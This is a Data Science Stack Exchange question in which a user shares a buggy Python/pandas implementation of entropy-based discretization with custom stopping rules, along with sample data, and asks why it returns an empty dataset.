        this.pieces[i].pos.x = this.pos.x + points[i][0] * gridSpace;
        this.pieces[i].pos.y = this.pos.y + points[i][1] *
```
gridSpace;\n}\n}\n}\n//Adds to the position of the piece and it's square objects\nthis.pos.x += x;\nthis.pos.y += y;\n\nif(this.pieces) {\nfor(var i = 0; i < 4; i++) {\nthis.pieces[i].pos.x += x;\nthis.pieces[i].pos.y += y;\n}\n}\n}\n//Checks for collisions after adding the x and y to the current positions and also applying the given rotation\nthis.futureCollision = function(x, y, rotation) {\nvar xx, yy, points = 0;\nif(rotation != this.rotation) {\n//Gets a new point orientation to check against\npoints = orientPoints(this.pieceType, rotation);\n}\n\nfor(var i = 0; i < this.pieces.length; i++) {\nif(points) {\nxx = this.pos.x + points[i] * gridSpace;\nyy = this.pos.y + points[i] * gridSpace;\n} else {\nxx = this.pieces[i].pos.x + x;\nyy = this.pieces[i].pos.y + y;\n}\n//Check against walls and bottom\nif(xx < gameEdgeLeft || xx + gridSpace > gameEdgeRight || yy + gridSpace > height) {\nreturn true;\n}\n//Check against all pieces in the main gridPieces array (stationary pieces)\nfor(var j = 0; j < gridPieces.length; j++) {\nif(xx === gridPieces[j].pos.x) {\nif(yy >= gridPieces[j].pos.y && yy < gridPieces[j].pos.y + gridSpace) {\nreturn true;\n}\nif(yy + gridSpace > gridPieces[j].pos.y && yy + gridSpace <= gridPieces[j].pos.y + gridSpace) {\nreturn true;\n}\n}\n}\n}\n}\n//Handles input ;)\nthis.input = function(key) {\nswitch(key) {\ncase LEFT_ARROW:\nif(!this.futureCollision(-gridSpace, 0, this.rotation)) {\n}\nbreak;\ncase RIGHT_ARROW:\nif(!this.futureCollision(gridSpace, 0, this.rotation)) {\n}\nbreak;\ncase UP_ARROW:\nvar rotation = this.rotation + 1;\nif(rotation > 3) {\nrotation = 0;\n}\nif(!this.futureCollision(gridSpace, 0, rotation)) {\nthis.rotate();\n}\nbreak;\n}\n}\n//Rotates the piece by one\nthis.rotate = function() {\nthis.rotation += 1;\nif(this.rotation > 3) {\nthis.rotation = 0;\n}\nthis.updatePoints();\n}\n//Displays the piece's square objects\nthis.show = function() {\nfor(var i = 0; i < this.pieces.length; i++) 
{\nthis.pieces[i].show();\n}\nfor(var i = 0; i < this.nextPieces.length; i++) {\nthis.nextPieces[i].show();\n}\n}\n//Add the pieces to the gridPieces\nthis.commitShape = function() {\nfor(var i = 0; i < this.pieces.length; i++) {\ngridPieces.push(this.pieces[i])\n}\nthis.resetPiece();\nanalyzeGrid();\n}\n}\n\nfunction square(x, y, type) {\nthis.pos = new p5.Vector(x, y);\nthis.type = type;\n\nthis.show = function() {\nstrokeWeight(2);\nvar colorDark = \"#092e1d\",\ncolorMid = colors[this.type];\n\nfill(colorMid);\nstroke(25);\nrect(this.pos.x, this.pos.y, gridSpace - 1, gridSpace - 1);\n\nnoStroke();\nfill(255);\nrect(this.pos.x + 6, this.pos.y + 6, 18, 2);\nrect(this.pos.x + 6, this.pos.y + 6, 2, 16);\nfill(25);\nrect(this.pos.x + 6, this.pos.y + 20, 18, 2);\nrect(this.pos.x + 22, this.pos.y + 6, 2, 16);\n}\n}\n\n//Basically random with a bias against the same piece twice\nfunction pseudoRandom(previous) {\nvar roll = Math.floor(Math.random() * 8);\nif(roll === previous || roll === 7) {\nroll = Math.floor(Math.random() * 7);\n}\nreturn roll;\n}\n\n//Checks until it can no longer find any horizontal staights\nfunction analyzeGrid() {\nvar score = 0;\nwhile(checkLines()) {\nscore += 100;\nlinesCleared += 1;\nif(linesCleared % 10 === 0) {\ncurrentLevel += 1;\n//Increase speed here\nif(updateEveryCurrent > 4) {\nupdateEveryCurrent -= 1;\n}\n}\n}\nif(score > 100) {\nscore *= 2;\n}\ncurrentScore += score;\n}\n\nfunction checkLines() {\nvar count = 0;\nvar runningY = -1;\nvar runningIndex = -1;\n\ngridPieces.sort(function(a, b) {\nreturn a.pos.y - b.pos.y;\n});\n\nfor(var i = 0; i < gridPieces.length; i++) {\nif(gridPieces[i].pos.y === runningY) {\ncount++;\nif(count === 10) {\n//YEEHAW\ngridPieces.splice(runningIndex, 10);\n\nreturn true;\n}\n} else {\nrunningY = gridPieces[i].pos.y;\ncount = 1;\nrunningIndex = i;\n}\n}\nreturn false;\n}\n\nfunction worker(y, amount) {\nthis.amountActual = 0;\nthis.amountTotal = amount;\nthis.yVal = y;\n\nthis.work = function() 
{\nif(this.amountActual < this.amountTotal) {\nfor(var j = 0; j < gridPieces.length; j++) {\nif(gridPieces[j].pos.y < y) {\ngridPieces[j].pos.y += 5;\n}\n}\nthis.amountActual += 5;\n} else {\ngridWorkers.shift();\n}\n}\n}\n\n//Sorts out the block positions for a given type and rotation\nfunction orientPoints(pieceType, rotation) {\nvar results = [];\nswitch(pieceType) {\ncase 0:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 1, 0]\n];\nbreak;\ncase 1:\nresults = [\n[0, -1],\n[0, 0],\n[0, 1],\n[0, 2]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 1],\n[-1, 1],\n[ 0, 1],\n[ 1, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[-1, 2]\n];\nbreak;\n}\nbreak;\ncase 1:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, -1],\n[-2, 0],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, -1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 0, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[-2, 1]\n];\nbreak;\n}\nbreak;\ncase 2:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 0, -1]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, 1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-2, 1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 3:\nresults = [\n[-2, -1],\n[-1, -1],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[ 0, -1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 4:\nswitch(rotation) {\ncase 0:\nresults = [\n[-1, -1],\n[-2, 0],\n[-1, 0],\n[ 0, -1]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[ 0, 0],\n[ 0, 1]\n];\nbreak;\ncase 2:\nresults = [\n[-1, 0],\n[-2, 1],\n[-1, 1],\n[ 0, 0]\n];\nbreak;\ncase 3:\nresults = [\n[-2, -1],\n[-2, 0],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 5:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[-1, -1],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, 0]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 
0],\n[-1, 0],\n[ 0, 0],\n[-1, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-2, 0],\n[-1, -1],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 6:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, -1],\n[-1, -1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, 0],\n[-1, 1],\n[ 0, 0],\n[ 0, -1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-1, 0],\n[-1, 1],\n[ 0, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-2, 0],\n[-2, 1],\n[-1, 0],\n[-1, -1]\n];\nbreak;\n}\nbreak;\n}\nreturn results;\n}\n```\n```\n!\n999px" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5445771,"math_prob":0.9935349,"size":15894,"snap":"2023-14-2023-23","text_gpt3_token_len":4910,"char_repetition_ratio":0.16985525,"word_repetition_ratio":0.21908548,"special_character_ratio":0.36907008,"punctuation_ratio":0.29045054,"nsfw_num_words":5,"has_unicode_error":false,"math_prob_llama3":0.96444964,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T15:28:39Z\",\"WARC-Record-ID\":\"<urn:uuid:b0d1d597-26d7-4912-93b0-f972235527f5>\",\"Content-Length\":\"135844\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90d04cb3-ca51-46ba-bb2f-a7b204206035>\",\"WARC-Concurrent-To\":\"<urn:uuid:947eeb84-42d4-4cbc-8162-986708cac5ec>\",\"WARC-IP-Address\":\"104.16.176.44\",\"WARC-Target-URI\":\"https://codepen.io/dylangggg/pen/pQJzpz\",\"WARC-Payload-Digest\":\"sha1:2ASJJSOUJRUBSI5QLRTPWARGNIAKIVNB\",\"WARC-Block-Digest\":\"sha1:OHSD3SDRQKOXQOWFRIQHYGQ7DSULP4A6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949009.11_warc_CC-MAIN-20230329151629-20230329181629-00723.warc.gz\"}"}
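The `pseudoRandom` helper in the pen above is the one non-obvious piece of game logic: it rolls 0–7 and re-rolls over 0–6 whenever the roll repeats the previous piece or lands on the out-of-range value 7, so repeats stay possible but become markedly less likely. A minimal Python sketch of the same idea (the snake-case name and the seed are illustrative, not part of the pen):

```python
import random

random.seed(7)  # seeded only so the sketch is reproducible

def pseudo_random(previous):
    """Roll 0-7; re-roll over 0-6 on hitting the previous piece or the
    out-of-range value 7. A repeat remains possible (the re-roll can
    land on `previous` again) but is far less likely than other pieces."""
    roll = random.randrange(8)
    if roll == previous or roll == 7:
        roll = random.randrange(7)
    return roll

rolls = [pseudo_random(3) for _ in range(1000)]
```

With `previous = 3`, the chance of rolling 3 works out to 1/28 versus roughly 9/56 for every other piece, so over 1000 rolls the repeat shows up only a few dozen times.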
http://videos.mathtutordvd.com/detail/video/kzWHO05uqSM/17---adding-subtracting-simplifying-rational-expressions-part-1
[ "", null, "[Home]    [Shop Courses]   [Streaming Membership]\n\n# Amazing Science\n\n## 17 - Adding, Subtracting & Simplifying Rational Expressions, Part 1\n\nView more at http://www.MathTutorDVD.com. In this lesson, you will learn how to add and subtract rational expressions and simplify the result. In order to do this, we follow the same rules of fraction arithmetic as we use for regular fractions. Specifically, to add fractions together we must first find a common denominator. When adding rational expressions we must also first find and calculate a common denominator. Once this is done we can add the numerators together as usual and simplify the result." ]
[ null, "https://www.mathtutordvd.com/public/images/color-logo-with-transparency-320.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89721924,"math_prob":0.8502152,"size":564,"snap":"2020-24-2020-29","text_gpt3_token_len":114,"char_repetition_ratio":0.1,"word_repetition_ratio":0.0,"special_character_ratio":0.19858156,"punctuation_ratio":0.119266056,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97889894,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-05T03:14:09Z\",\"WARC-Record-ID\":\"<urn:uuid:6f205a73-8f76-4a1f-8e87-ead356f81887>\",\"Content-Length\":\"141492\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b1ef8bf4-7fb6-425e-b14d-560350c23201>\",\"WARC-Concurrent-To\":\"<urn:uuid:3961cb2e-876d-42dc-9387-ae4cb71e68f1>\",\"WARC-IP-Address\":\"52.71.152.113\",\"WARC-Target-URI\":\"http://videos.mathtutordvd.com/detail/video/kzWHO05uqSM/17---adding-subtracting-simplifying-rational-expressions-part-1\",\"WARC-Payload-Digest\":\"sha1:JAVH2JQWQQYCPIBJCG5NZXJXPGLGU4XF\",\"WARC-Block-Digest\":\"sha1:YSN7HCUTBIERUJRPSEDPI2PXIMU6NDYI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655886865.30_warc_CC-MAIN-20200705023910-20200705053910-00244.warc.gz\"}"}
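The lesson's rule — convert to a common denominator, add the numerators, then simplify — is exactly what exact-fraction arithmetic does under the hood. A quick illustration with Python's stdlib `fractions` module (the variable names are arbitrary):

```python
from fractions import Fraction

# 1/2 + 1/3: the common denominator is 6, so 3/6 + 2/6 = 5/6.
a = Fraction(1, 2)
b = Fraction(1, 3)
total = a + b  # Fraction finds the common denominator and reduces the result
```

Here `total` is `Fraction(5, 6)`; the same procedure carries over to rational expressions, with polynomials playing the role of the integers.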
https://dirkmittler.homeip.net/blog/archives/tag/standard-deviation
[ "## The Cumulative Effect, Of Adding Many Random Numbers\n\nThe question must have crossed many people’s minds, of what the cumulative effect is, if they take the same calculated risk many times, i.e., if they add a series of numbers, each of which is random, and for the sake of argument, if each numbers has the same standard deviation.\n\nThe formal answer to that question is explained in This WiKiPedia Article. What the article states, is that ‘If two independently-random numbers are added, their expected values are added, as well as their variance, to give the expected value and the variance of the sum.’\n\nBut, what I already know, is that standard deviation is actually the square root of variance. Conversely, variance is already standard deviation squared. Therefore, the problem could be such, that the standard deviation of the individual numbers is known in advance, but that (n) random numbers are to be added. And then, because it is the square root of variance, the standard deviation of the sum will increase, as the square root of (n), times whatever the standard deviation of any one number in the series was.\n\nThis realization should be important to any people, who have a gambling problem, because people may have a tendency to think, that if they had ‘bad luck’ at a gambling table, ‘future good luck’ will come, to cancel out the bad luck they’ve already experienced. This is generally untrue, because as (n) increases, the square root of (n) will also just take the sum – of individual bets if the reader wishes – further and further away, from the expected value, because the square root of (n) will still increase. On average!\n\nBut, if we are to consider the case of gambling, then we must also take into account the expected value, which is just the average return of one bet. In the real-world case of gambling, this value is biased against the player, and earns the gambling establishment its profit. 
Well, according to what I wrote above, this will continue to increase linearly.\n\nNow, the question which may come to mind next would be, what effect such a summation of data has on averages. And the answer lies in the fact that the square root of (n), is a half-power of (n). A full power of (n) would grow linearly with (n), while the zero-power of (n), would just stay constant.\n\nAnd so the effect of summing many random numbers will first of all be, that the maximum and the minimum result theoretically possible, will be (n) times as far apart as they were for any one random number. This reflects the possibility, that ‘if (n) dice were rolled’, they could theoretically all come up as the maximum value possible, or all come up as the minimum value possible. And what this does to the graph of the distribution, is it initially makes the domain of the distribution curve linearly wider, along the x-axis, as a function of (n) – as the first power of (n).\n\n(Updated 05/16/2018 … )\n\n## The Relationship between Voltage and Energy\n\nEnergy is proportional to voltage squared. If we make the assumption that a variable voltage is being fed to a constant load-resistor, then with voltage, current would increase, and current would get multiplied by voltage again, to result in energy.\n\nSound energy is proportional to sound pressure squared. With increasing sound pressure, minute displacement / compression of air results, which causes displacement to rise, and displacement times pressure is again – energy.\n\nThe decibel scale is in energy units, not pressure units. Therefore, if a voltage increases by the square root of two, and if that voltage is fed to a constant load, then energy doubles, which is loosely expressed as a 3db relationship. A doubling of voltages would result in a quadrupling of energy units, which is loosely described as a 6db relationship.\n\nSomething similar happens to digitally sampled sound. 
The amplitudes of the samples correspond roughly to the Statistical concept of Standard Deviation, while the Statistical concept of Variance, corresponds to signal-energy. Variance equals Standard Deviation squared…\n\nDirk\n\nI should add that this applies to small-signal processing, but not to industrial power-transmission. In the latter case, the load resistances are intentionally made to scale with voltages, because the efficiency-gains that stem from voltage-increases, only stem from keeping current-levels under control. Thus, in the latter case, higher amounts of power are transmitted, but without involving higher levels of current. And so here, voltages tend to relate to power units more-or-less linearly.\n\n## The wording ‘Light Values’ can play tricks on people.\n\nWhat I wrote before, was that between (n) real, 2D photos, 1 light-value can be sampled.\n\nSome people might infer that I meant, always to use the brightness value. But this would actually be wrong. I am assuming that color footage is being used.\n\nAnd if I wanted to compare pixel-colors, to determine best-fit geometry, I would most want to go by a single hue-value.\n\nIf the color being mapped averages to ‘yellow’ – which facial colors do – then hue would be best-defined as ‘the difference between the Red and Green channels’.\n\nBut the way this works out negatively, is in the fact that actual photographic film which was used around 1977, differentiated most poorly between Red and Green, as did any chroma / video signal. 
And Peter Cushing was being filmed in 1977, so that our reconstruction of him might appear in today’s movies.\n\nSo then an alternative might be, ‘Normalize all the pixels to have the same luminance, and then pick whichever primary channel that the source was best-able to resolve into minute details, on a physical level.’\n\nMaybe 1977 photographic projector-emulsions differentiated the Red primary channel best?\n\nFurther, given that there are 3 primary colors in most forms of graphics digitization, and that I would remove the overall luminance, it would follow that maybe 2 actual remaining color channels could be used, the variance of each computed separately, and the variances added?\n\nIn general, it is Mathematically safer to add Variances, than it would be to add Deviations, where Variance corresponds to Deviation squared, and where Variance therefore also corresponds to Energy, if Deviation corresponded to Potential. It is more generally agreed that Energy and its homologues are conserved quantities.\n\nDirk" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9618353,"math_prob":0.95513004,"size":2919,"snap":"2019-35-2019-39","text_gpt3_token_len":636,"char_repetition_ratio":0.12418525,"word_repetition_ratio":0.019646365,"special_character_ratio":0.22028092,"punctuation_ratio":0.1220339,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98881227,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-23T01:09:39Z\",\"WARC-Record-ID\":\"<urn:uuid:90d503b6-59a4-45df-8286-890fd60146af>\",\"Content-Length\":\"51643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0e53f7fa-a070-48ba-9839-fe494778d8a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:08411d89-b3da-4614-8982-c5f47c8792af>\",\"WARC-IP-Address\":\"69.157.146.14\",\"WARC-Target-URI\":\"https://dirkmittler.homeip.net/blog/archives/tag/standard-deviation\",\"WARC-Payload-Digest\":\"sha1:MXIKUSKSFC3RZI7E5N4TRP7IYZNGZQQ6\",\"WARC-Block-Digest\":\"sha1:BLX3NM4VIHRSJXQCUHZWPHJ4NAT6L7YS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514575844.94_warc_CC-MAIN-20190923002147-20190923024147-00354.warc.gz\"}"}
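The post's central claim — that variances of independent numbers add, so the standard deviation of a sum of (n) of them grows as the square root of (n) — is easy to check numerically. A stdlib-only sketch (sigma, n, and the sample count are arbitrary choices):

```python
import math
import random
import statistics

random.seed(42)          # reproducible simulation
sigma = 2.0              # standard deviation of a single number
n = 100                  # how many independent numbers are summed

# Variances add for independent numbers, so the spread of the sum is
# predicted to be sqrt(n) times the spread of one number:
predicted = sigma * math.sqrt(n)          # 2.0 * sqrt(100) = 20.0

# Measure it directly: many sums of n Gaussian draws.
sums = [sum(random.gauss(0.0, sigma) for _ in range(n))
        for _ in range(5000)]
observed = statistics.pstdev(sums)
```

The observed spread lands close to 20.0 rather than n·sigma = 200, confirming the half-power growth the post describes: the expected value moves linearly with (n), but the spread only as its square root.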
https://socratic.org/questions/how-do-you-factor-completely-2x-2-20-x-2-9x
[ "# How do you factor completely 2x^2+20=x^2+9x?\n\nDec 28, 2017\n\nGiven: $2 {x}^{2} + 20 = {x}^{2} + 9 x$\n\nCombine terms so that the quadratic is equal to 0:\n\n${x}^{2} - 9 x + 20 = 0$\n\nThis will factor into $\\left(x - {r}_{1}\\right) \\left(x - {r}_{2}\\right) = 0$, if we can find numbers such that ${r}_{1} {r}_{2} = 20$ and $- \\left({r}_{1} + {r}_{2}\\right) = - 9$.\n\n4 and 5 will do it $\\left(4\\right) \\left(5\\right) = 20$ and $- \\left(4 + 5\\right) = - 9$:\n\n$\\left(x - 4\\right) \\left(x - 5\\right) = 0$\n\nDec 28, 2017\n\nSet it equal to zero, then find factors of $c$ that add to $b$.\n\n#### Explanation:\n\nSet equal to zero:\n\n${x}^{2} - 9 x + 20 = 0$\n\nLooking at the discriminant: (${b}^{2} - 4 a c$)\n\n$81 - 4 \\cdot 1 \\cdot 20 = 81 - 80 = 1$\n\nSince $1$ is a perfect square, we know it factors.\n\nFactors of $20$ that add to $- 9$ are $- 5$ and $- 4$.\n\n$\\left(x - 5\\right) \\left(x - 4\\right) = {x}^{2} - 9 x + 20$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6950424,"math_prob":1.0000099,"size":431,"snap":"2019-51-2020-05","text_gpt3_token_len":121,"char_repetition_ratio":0.11007026,"word_repetition_ratio":0.0,"special_character_ratio":0.2737819,"punctuation_ratio":0.1,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000038,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-15T16:50:16Z\",\"WARC-Record-ID\":\"<urn:uuid:126833d7-36b1-40a1-a094-3387ed745ed4>\",\"Content-Length\":\"34885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cd29e802-1d5d-4037-9677-da22819e5633>\",\"WARC-Concurrent-To\":\"<urn:uuid:e4bfc433-c776-41cc-a391-1b1326b6f7ed>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-factor-completely-2x-2-20-x-2-9x\",\"WARC-Payload-Digest\":\"sha1:DQU2T56HW3U6RGNFVYEDFBSD5U2XUSWG\",\"WARC-Block-Digest\":\"sha1:XFXBABOXIGELXPYKGB2ABD3CD7EIOZKM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541308604.91_warc_CC-MAIN-20191215145836-20191215173836-00277.warc.gz\"}"}
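Both answers hinge on the same search: two integers whose product is the constant term and whose sum matches the (sign-flipped) linear coefficient. A small Python sketch of that search (the helper name `integer_roots` is invented for this illustration):

```python
def integer_roots(b, c):
    """For x^2 - b*x + c, find integers r1 <= r2 with r1 + r2 == b and
    r1 * r2 == c, so the quadratic factors as (x - r1)(x - r2).
    Returns None when no integer pair exists."""
    for r1 in range(-abs(c) - 1, abs(c) + 2):
        r2 = b - r1
        if r1 * r2 == c:
            return tuple(sorted((r1, r2)))
    return None

# x^2 - 9x + 20 = (x - 4)(x - 5): product 20, sum 9
roots = integer_roots(9, 20)
```

For x² − 9x + 20 this returns (4, 5), matching the factorization in both answers; when the discriminant is not a perfect square (e.g. c = 19), no integer pair exists and the helper returns None.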
https://datascience.stackexchange.com/questions/103339/how-to-apply-entropy-discretization-to-a-dataset
[ "# How to apply entropy discretization to a dataset\n\nI have a simple dataset that I'd like to apply entropy discretization to. The program needs to discretize an attribute based on the following criteria:\n\nWhen either the condition “a” or condition “b” is true for a partition, then that partition stops splitting:\n\na- The number of distinct classes within a partition is 1.\n\nb- The ratio of the minimum to maximum frequencies among the distinct values for the attribute Class in the partition is <0.5 and the number of distinct values\nwithin the attribute of Class in the partition is Floor(n/2), where n is the number of distinct values in the original dataset.\n\nAs an example,\n\n100 records; these are the unique values of those records\n\nv1 10\nv2 30\nv3 15\nv4 20\nv5 25\n\n--- n = 5\n\ns1\n\nv1 10 -> 10/30 = .34\nv2 30\nv3 15\n\n--- n1 = 3\n\ns2\nv4 20 -> 20/25 = 0.8\nv5 25\n\n--- n2 = 2\n\nif minf(s1)/maxf(s1) < 0.5 then condition 1 of b is met and floor(n/2) == n1 then condition 2 of b is met.\nstop split\n\n\nin this case v1 is the min in s1 and v2 is the max. 
So the algorithm should stop splitting.\n\nExpected: The program should return the bestpartition based on the maximum information gain.\n\nActual: An empty dataset is returned\n\nI have written an implementation\n\nfrom numpy.core.defchararray import count\nimport pandas as pd\nimport numpy as np\nimport numpy as np\nfrom math import floor, log2\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plot\n\ndef print_full(x):\npd.set_option('display.max_rows', len(x))\nprint(x)\npd.reset_option('display.max_rows')\n\ndef main():\nprint(s)\nprint(\"******************************************************\")\nprint(\"Entropy Discretization STARTED\")\ns = entropy_discretization(s)\nprint(\"Entropy Discretization COMPLETED\")\nprint(s)\nprint(\"******************************************************\")\n\ndef entropy_discretization(s):\n\nI = {}\ni = 0\nn = s.nunique()['A1']\ns_temp = s\ns1 = pd.DataFrame()\ns2 = pd.DataFrame()\nwhile(uniqueValue(s_temp)):\n\n# Step 1: pick a threshold\nthreshold = s_temp['A1'].iloc\n\n# Step 2: Partititon the data set into two parttitions\ns1 = s[s['A1'] < threshold]\nprint(\"s1 after spitting\")\nprint(s1)\nprint(\"******************\")\ns2 = s[s['A1'] >= threshold]\nprint(\"s2 after spitting\")\nprint(s2)\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating maxf\")\nprint(f\" maxf {maxf(s['A1'])}\")\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating minf\")\nprint(f\" maxf {minf(s['A1'])}\")\nprint(\"******************\")\n\n# print(maxf(s['A1'])/minf(s['A1']))\nif (maxf(s1['A1'])/minf(s1['A1']) < 0.5) and (s_temp.nunique()['A1'] == floor(n/2)):\nprint(f\"Condition b is met{maxf(s1['A1'])}/{minf(s1['A1'])} < {0.5} {s_temp.nunique()['A1']} == {floor(n/2)}\")\nbreak\n\n# Step 3: calculate the information gain.\ninformationGain = information_gain(s1,s2,s_temp)\nI.update({f'informationGain_{i}':informationGain,f'threshold_{i}': threshold})\ns_temp = 
s_temp[s_temp['A1'] != threshold]\ni += 1\n\n# Step 5: calculate the min information gain\nn = int(((len(I)/2)-1))\nprint(\"Calculating maximum threshold\")\nprint(\"*****************************\")\nmaxInformationGain = 0\nmaxThreshold = 0\nfor i in range(0, n):\nif(I[f'informationGain_{i}'] > maxInformationGain):\nmaxInformationGain = I[f'informationGain_{i}']\nmaxThreshold = I[f'threshold_{i}']\n\nprint(f'maxThreshold: {maxThreshold}, maxInformationGain: {maxInformationGain}')\n\ns = pd.merge(s1,s2)\n\n# Step 6: keep the partitions of S based on the value of threshold_i\nreturn s #maxPartition(maxInformationGain,maxThreshold,s,s1,s2)\n\ndef maxf(s):\nreturn s.max()\n\ndef minf(s):\nreturn s.min()\n\ndef uniqueValue(s):\n# are records in s the same? return true\nif s.nunique()['A1'] == 1:\nreturn False\n# otherwise false\nelse:\nreturn True\n\ndef maxPartition(maxInformationGain,maxThreshold,s,s1,s2):\nprint(f'informationGain: {maxInformationGain}, threshold: {maxThreshold}')\nmerged_partitions = pd.merge(s1,s2)\nmerged_partitions = pd.merge(merged_partitions,s)\nprint(\"Best Partition\")\nprint(\"***************\")\nprint(merged_partitions)\nprint(\"***************\")\nreturn merged_partitions\n\ndef information_gain(s1, s2, s):\n# calculate cardinality for s1\ncardinalityS1 = len(pd.Index(s1['A1']).value_counts())\nprint(f'The Cardinality of s1 is: {cardinalityS1}')\n# calculate cardinality for s2\ncardinalityS2 = len(pd.Index(s2['A1']).value_counts())\nprint(f'The Cardinality of s2 is: {cardinalityS2}')\n# calculate cardinality of s\ncardinalityS = len(pd.Index(s['A1']).value_counts())\nprint(f'The Cardinality of s is: {cardinalityS}')\n# calculate informationGain\ninformationGain = (cardinalityS1/cardinalityS) * entropy(s1) + (cardinalityS2/cardinalityS) * entropy(s2)\nprint(f'The total informationGain is: {informationGain}')\nreturn informationGain\n\ndef entropy(s):\nprint(\"calculating the entropy for 
```python
    print("*****************************")
    print(s)
    print("*****************************")

    # initialize ent
    ent = 0

    # calculate the number of classes in s
    numberOfClasses = s['Class'].nunique()
    print(f'Number of classes for dataset: {numberOfClasses}')
    value_counts = s['Class'].value_counts()
    p = []
    for i in range(0, numberOfClasses):
        n = s['Class'].count()
        # calculate the frequency of class_i in S1
        print(f'p{i} {value_counts.iloc[i]}/{n}')
        f = value_counts.iloc[i]
        pi = f/n
        p.append(pi)

    print(p)

    for pi in p:
        ent += -pi*log2(pi)

    return ent

main()
```

A set of sample data looks like this:

```
A1,A2,A3,Class
2,0.4631338,1.5,3
8,0.7460648,3.0,3
6,0.264391038,2.5,2
5,0.4406713,2.3,1
2,0.410438159,1.5,3
2,0.302901816,1.5,2
6,0.275869396,2.5,3
```

Any help understanding why the method returns an empty dataset would be greatly appreciated.

I've attempted to create a procedure for this which splits the data into two partitions, but I would appreciate feedback as to whether my implementation is correct:

```python
from numpy.core.defchararray import count
import pandas as pd
import numpy as np
from math import floor, log2
from sklearn.decomposition import PCA
import matplotlib.pyplot as plot

def print_full(x):
    pd.set_option('display.max_rows', len(x))
    print(x)
    pd.reset_option('display.max_rows')

def main():
    print("******************************************************")
    print("Entropy Discretization STARTED")
    s = entropy_discretization(s)
    print("Entropy Discretization COMPLETED")

# This method discretizes attribute A1.
# If the information gain is 0 (i.e. the number of
# distinct classes is 1), or
# if min f / max f < 0.5 and the number of distinct values is floor(n/2),
# then that partition stops splitting.
def entropy_discretization(s):

    I = {}
    i = 0
    n = s.nunique()['Class']
    s1 = pd.DataFrame()
    s2 = pd.DataFrame()
    distinct_values = s['Class'].value_counts().index
    information_gain_indicies = []
    print(f'The unique values for dataset s["Class"] are {distinct_values}')
    for i in distinct_values:

        # Step 1: pick a threshold
        threshold = i
        print(f'Using threshold {threshold}')

        # Step 2: partition the data set into two partitions
        s1 = s[s['Class'] < threshold]
        print("s1 after splitting")
        print(s1)
        print("******************")
